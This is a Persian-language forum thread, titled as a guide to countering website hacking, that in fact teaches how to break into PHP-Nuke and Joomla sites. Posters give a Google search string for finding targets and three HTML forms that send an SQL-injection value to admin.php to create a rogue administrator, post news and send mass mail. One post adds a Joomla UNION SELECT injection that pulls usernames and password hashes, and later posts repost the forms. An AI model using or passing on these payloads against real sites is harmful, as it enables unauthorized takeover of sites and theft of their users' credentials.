Avaxnet

Avaxnet > کامپیوتر > اینترنت - شبکه - DSL و سخت افزار > Yahoo Messenger > آموزش مقابله با هک کردن سایت
نسخه کامل: آموزش مقابله با هک کردن سایت
شما در حال مشاهده نسخه تکمیل نشده می باشید. مشاهده نسخه کامل با قالب بندی مناسب.

saeed_z

Saturday 03 March 2007, 23:09
من براي شما دوستان ميخوام چند تا باگ جديد رو بزارم تا ازشون ستفاده کنين.
براي شروع به گوگل بريد



و بعد بايد دنبال سايت هايي که از سيستم phpnuke استفاده ميکنن بگرديد , شايد بگيد چه جوري؟
براي اين کار کافيه اين نوشته رو کپي و پيست کنيد.


کد:
modules.php?name=Downloads

اين ماژول در تمامي ورژن هاي php nuke وجود داره.
خوب بعد از اين کار گوگل کلي سايت که از سيستم phpnuke استفاده ميکنن مياره بريد رويه يکي از لينکها کليک کنيد وقتي سايت باز شد بايد ببينيد که شاخه phpnuke چيه
ممکنه به اين شکلها باشه



کد PHP:
http://www.*******.com/phpnuke/mod...?name=Downloads
 (http://www..*******..com/phpnuke/mod...name=Downloads)
 http://www..*******..com/html/module...name=Downloads 
(http://www..*******..com/html/module...name=Downloads) 
 http://www..*******..com/portal/modu...?name=Downloads
 (http://www..*******..com/portal/modu...name=Downloads)
  www..*******..com/modules.php?name=Downloads 
(http://www..*******..com/modules.php?name=Downloads) 


براي اينکه بتونيم از اين روش سايتها رو هک کنيم بايد فايل admin.php رو سايت باشه
براي اينکه بدونين هست يا نه

کد:
modules.php?name=Downloads


اينو پاک کنين و جاش بنويسيد admin.php
مثلآ:

کد PHP:
www..*******..com/admin.php (http://www..*******..com/admin.php) 


اگه صفحه وارد کردن نام کاربري و پسورد اومد يعني وجود داره و اگه هم با Error برخورد کرديد معلوم ميشه که مدير سايت فايل admin.php رو برداشته. اگه admin.php بود که به مرحله بعدي ميريد اگر هم نبود اون سايت رو بي خيال شيد.

خوب حالا ما فرض ميکنيم که admin.php وجود داره.

من به شما چند تا باگ ميدم که از طريق اونا شما بتونين به سيستم مديريت سايت نفوذ کنيد و به راحتي بتونين سيستم مديريت سايت رو به دست بگيريد.

شما براي اجراي اين کد ها Notepad رو باز کنيد کد رو داخلش بنويسيد و از منويه File گزينه Save As.. رو انتخاب کنيد و هر کجا که ميخواين با نام دلخواه تون Save کنيد البته بعد از اينکه نام فايل رو نوشتيد پسوند اونو .HTML بزاريد.

بعد فايلتونو داخل Notepad باز کنيد و به جاي [sitename] آدرس سايتي رو که ميخواين هک کنين رو بنويسيد.


کد اول: با استفاده از اين ميتونين داخل سايت يه کاربر با امکانات ادمين سايت ايجاد کنيد و سپس وارد سيستم مديريت سايت بشيد و سايت رو هک کنيد.

کد PHP:
<form name="mantra" method="POST"  action="http://www.sitename.com/admin.php"
USERNAME: <input  name="add_aid" type="text">
 NOME: <input name="add_name"  type="text">
 PASSWORD: <input name="add_pwd"  type="text">
 E-MAIL: <input name="add_email"  type="text">
 <input name="admin"  value="eCcgVU5JT04gU0VMRUNUIDEvKjox" type="hidden">
 <input name="add_radminsuper" value="1" type="hidden">
 <input name="op" value="AddAuthor"  type="hidden"><p>
</p> <input name="Submit"  value="Create Admin" type="submit"><br
</form

این هم نمونه اجرا شده این کد

کد:
<form name="mantra" method="POST"  action="http://www.sitename.com/admin.php"> USERNAME: <input  name="add_aid" type="text">
  NOME: <input name="add_name"  type="text">
  PASSWORD: <input name="add_pwd"  type="text">
  E-MAIL: <input name="add_email"  type="text">
  <input name="admin"  value="eCcgVU5JT04gU0VMRUNUIDEvKjox" type="hidden">
  <input name="add_radminsuper" value="1" type="hidden">
  <input name="op" value="AddAuthor"  type="hidden"><p>
</p> <input name="Submit"  value="Create Admin" type="submit"><br>
</form>


کد دوم: با اين کد ميتونين يه خبر رو بدون ورود به سيستم مديريت به سايت بفرستيد.


کد PHP:
<form name="mantra" method="POST"  action="http://www.sitename.com/admin.php"> <p>
TITLE: <input  name="add_title" type="text"
 CONTENT: <textarea  name="add_content" rows="10" cols="50"></textarea
 DATE: <input name="add_mdate" type="text"
 E-MAIL:  <input name="add_expire" type="text"
 <input  name="add_expire" value="0" type="hidden"> <br
<input  name="add_active" value="1" type="hidden"
 <input  name="add_view" value="1" type="hidden"
 <input  name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox" type="hidden">  
 <input name="add_radminsuper" value="1" type="hidden">  
 <input name="op" value="addmsg" type="hidden">  </p
<p> <input name="Submit" value="Post this message"  type="submit"
 </p


که بعد از اجر شدن این شکلی میشه

کد:
<form name="mantra" method="POST"  action="http://www.sitename.com/admin.php"> <p>TITLE: <input  name="add_title" type="text"> <br> CONTENT: <textarea  name="add_content" rows="10" cols="50"></textarea> <br>  DATE: <input name="add_mdate" type="text"> <br> E-MAIL:  <input name="add_expire" type="text"> <br> <input  name="add_expire" value="0" type="hidden"> <br> <input  name="add_active" value="1" type="hidden"> <br> <input  name="add_view" value="1" type="hidden"> <br> <input  name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox" type="hidden">  <br> <input name="add_radminsuper" value="1" type="hidden">  <br> <input name="op" value="addmsg" type="hidden">  </p> <p> <input name="Submit" value="Post this message"  type="submit"> <br> </p>


کد سوم: اين کد هم تقريبآ مثل کد بالا عمل ميکنه.

کد PHP:
<p>TITLE: <input name="title" type="text"
 CONTENT: <textarea name="content" rows="10"  cols="50"></textarea> <br
<input name="admin"  value="eCcgVU5JT04gU0VMRUNUIDEvKjox" type="hidden"
 <input name="add_radminsuper" value="1" type="hidden"
 <input name="op" value="massmail_send" type="hidden"> </p>
 <p> <input name="Submit" value="Send to target site newsletter"  type="submit"
 </p> </form

که بعد از اجرا این شکلی مشه


کد:
<p>TITLE: <input name="title" type="text"> <br>  CONTENT: <textarea name="content" rows="10"  cols="50"></textarea> <br> <input name="admin"  value="eCcgVU5JT04gU0VMRUNUIDEvKjox" type="hidden"> <br>  <input name="add_radminsuper" value="1" type="hidden"> <br>  <input name="op" value="massmail_send" type="hidden"> </p>  <p> <input name="Submit" value="Send to target site newsletter"  type="submit"> <br> </p> </form>

MASOOD OK

Friday 06 June 2008, 20:27
دوستان عزیز حالا برای اینکه خیالتون راحت بشه از این هم راحت تر هست این هم جدید ترین راه هک سایت در جوملا هست به تاریخ امروز هست روی هر سایت که با جوملا باشه کار میکنه ...
هک از طریق باگی که در کامپوننت های جوملاهست ...
Joomla Component joomladate Remote SQL injection

کل کدها و نحوه استفاده ...


کد PHP:
http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}

مثال http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&

user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),

user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users 



تاریخ :
2008-06-05

برای دانلود این آسیب پذیری و اطلاعات بیشتر


موفق باشید باز هم میگم که هک کردن به این روشها ساده هست یعنی فقط شما از دستور العمل ها و ابزارهای
دیگران استفاده میکنید .
اما پیدا کردن این آسیب پذیری ها بسیار سخت و کار افراد حرفه ای هست

shadow.avaxnet

Sunday 23 August 2009, 00:08
دوستان به دلیل این که این سایت از فایل های php پشتیبانی میکنه متاسفانه تگ هایی که استاد محترم cia نوشتن به صورت اجرایی در اومده.لذا این تگ ها رو یه بار دیگه براتون میزارم و برای این که سایت این تگها رو اجرا نکنه و شما بتونین تگ رو بخونین اونها رو به صورت <-- tag --!>(توضیحات) قرار میدم.لذا کافیه شما دوستان متن زیر رو در notepadکپی کنین و طبق گفته های جناب cia عمل کنید.
تگ اول:

کد PHP:
<form name="mantra" method="POST" action="[url=http://www.sitename.com/admin.php]http://www.sitename.com/admin.php[/url]">  USERNAME: <input type="text" name="add_aid"><br
NOME:  <input type="text" name="add_name">
 PASSWORD: <input  type="text" name="add_pwd">
 E-MAIL: <input type="text"  name="add_email">
 <input type="hidden" name="admin"  value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
 <input  type="hidden" name="add_radminsuper" value="1"><br
<input  type="hidden" name="op" value="AddAuthor"></p>
 <input  type="submit" name="Submit" value="Create Admin">
 </form

نمونه اجرا شده کدهای بالا

کد:
<form name="mantra" method="POST" action="[url=http://www.sitename.com/admin.php]http://www.sitename.com/admin.php[/url]">  USERNAME: <input type="text" name="add_aid"><br> NOME:  <input type="text" name="add_name"><br> PASSWORD: <input  type="text" name="add_pwd"><br> E-MAIL: <input type="text"  name="add_email"><br> <input type="hidden" name="admin"  value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input  type="hidden" name="add_radminsuper" value="1"><br> <input  type="hidden" name="op" value="AddAuthor"></p> <input  type="submit" name="Submit" value="Create Admin"><br>  </form>

shadow.avaxnet

Sunday 23 August 2009, 00:12
تگ دوم با اين کد ميتونين يه خبر رو بدونه ورود به سيستم مديريت به سايت بفرستيد

کد PHP:
<form name="mantra" method="POST" action="[url=http://www.sitename.com/admin.php]http://www.sitename.com/admin.php[/url]">  <p>TITLE: <input type="text" name="add_title"
 CONTENT: <textarea name="add_content" rows=10  cols=50></textarea> <br
DATE: <input type="text"  name="add_mdate"
 E-MAIL: <input type="text"  name="add_expire"
 <input type="hidden"  name="add_expire" value="0"
 <input type="hidden"  name="add_active" value="1"
 <input type="hidden"  name="add_view" value="1"
 <input type="hidden"  name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"
 <input type="hidden" name="add_radminsuper" value="1"
 <input type="hidden" name="op" value="addmsg"> </p>
 <p> <input type="submit" name="Submit" value="Post this  message"></p

نمونه اجرا شده کدهای بالا

کد:
<form name="mantra" method="POST" action="[url=http://www.sitename.com/admin.php]http://www.sitename.com/admin.php[/url]">  <p>TITLE: <input type="text" name="add_title"> <br>  CONTENT: <textarea name="add_content" rows=10  cols=50></textarea> <br> DATE: <input type="text"  name="add_mdate"> <br> E-MAIL: <input type="text"  name="add_expire"> <br> <input type="hidden"  name="add_expire" value="0"> <br> <input type="hidden"  name="add_active" value="1"> <br> <input type="hidden"  name="add_view" value="1"> <br> <input type="hidden"  name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br>  <input type="hidden" name="add_radminsuper" value="1"> <br>  <input type="hidden" name="op" value="addmsg"> </p>  <p> <input type="submit" name="Submit" value="Post this  message">  </p>

shadow.avaxnet

Sunday 23 August 2009, 00:13
تگ سوم اين کد هم تقريبآ مثل کد بالا عمل ميکنه




کد PHP:
<form name="mantra" method="POST" action="[url=http://www.sitename.com/admin.php]http://www.sitename.com/admin.php[/url]"> <p>TITLE: <input type="text" name="title"> <br>  
CONTENT: <textarea name="content" rows=10  cols=50></textarea
 <input type="hidden"  name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br
 <input type="hidden" name="add_radminsuper" value="1"
  <input type="hidden" name="op" value="massmail_send"> </p>
  <p> <input type="submit" name="Submit" value="Send to target  site newsletter"
 </p> </form 

shadow.avaxnet

Sunday 23 August 2009, 00:19

راستی در قسمت اول آموزش جناب cia فرموده بودن فایل نوت پد را به صورت html ذخیره کنین.

میدونم همگی استاد من هستین اما لازم دیدم بگم اگه میخواید فایل نوت پد رو به صورت html ذخیره کنید باید عبارت  "xxxx.html" رو در قسمت filename تایپ کنید.. به جای xxxx اسم مورد نظرتون رو قرار بدید.در غیر این صورت فایل شما به صورت html ذخیره نمیشه و تنها text هست.حتما ( " ) رو فراموش نکنید.

salar.exe

Thursday 06 January 2011, 18:46
دوست عزیز من رو چندتا سایت تست کردم ارور میده چه کنم؟
Illegal Operation اینم ارورش
ایا یوزر وپس مشخص میخواد و اون نوم که نوشته چی هستش لطفا راهنمایی کنید

Messi Nitlo

Monday 09 May 2011, 19:21
دوستان برای من هم همین ارور رو میده ؟؟؟؟؟؟

farhad23

Wednesday 18 May 2011, 21:14
الکین.
Avaxnet > کامپیوتر > اینترنت - شبکه - DSL و سخت افزار > Yahoo Messenger > آموزش مقابله با هک کردن سایت
لینک مرجع